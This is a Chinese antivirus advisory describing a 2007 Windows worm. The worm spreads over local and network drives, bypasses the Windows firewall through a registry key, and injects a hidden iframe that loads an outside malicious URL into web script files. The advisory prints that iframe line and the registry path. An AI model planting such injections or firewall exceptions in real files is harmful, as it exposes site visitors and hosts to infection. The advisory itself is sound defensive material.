天高云淡

危险等级：★★★
病毒名称：Worm.Win32.Small.ar
截获时间：2007-10-30
入库版本：19.47.11
类型：病毒

感染的操作系统：Windows XP, Windows NT, Windows Server 2003, Windows 2000

威胁情况：

传播级别：低

全球化传播态势：低

破坏力：低

清除难度：困难

破坏手段：感染脚本文件

1、病毒运行后，删除Temp目录下的VR*.TMP，因为病毒感染文件时，会在Temp目录下备份文件即将被感染的文件。

2、修改注册表，把病毒文件添加到Windows防火墙默认放行列表：HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\
List:*:enabled:@shell32.dll,-1，这样就绕过了Windows的防火墙。

3、遍历分区（C-Z），对于本地硬盘以及可移动存储设备的分区，则遍历这些分区中的EXE、SCR、htm、php、ASP文件。针对htm、php、ASP脚本文件后面加上下面的链接<iframe src=”http://ntkrnlpa.info/rc/?i=1″ width=1 height=1 style=”border:0″></iframe>，当打开被感染后的脚本文件，会自动连接上面的网址。针对EXE、SCR文件，作者还没有实现具体功能，但作者已经留下了接口，估计会在之后的版本中实现。对于映射的网络驱动器，

则使用WNetOpenEnumA、WNetEnumResourceA、WNetCloseEnum这些API来枚举局域网内计算机的共享资源，并使用与用第3步的相同的方式对共享文件夹的文件进行感染。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.47.11版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。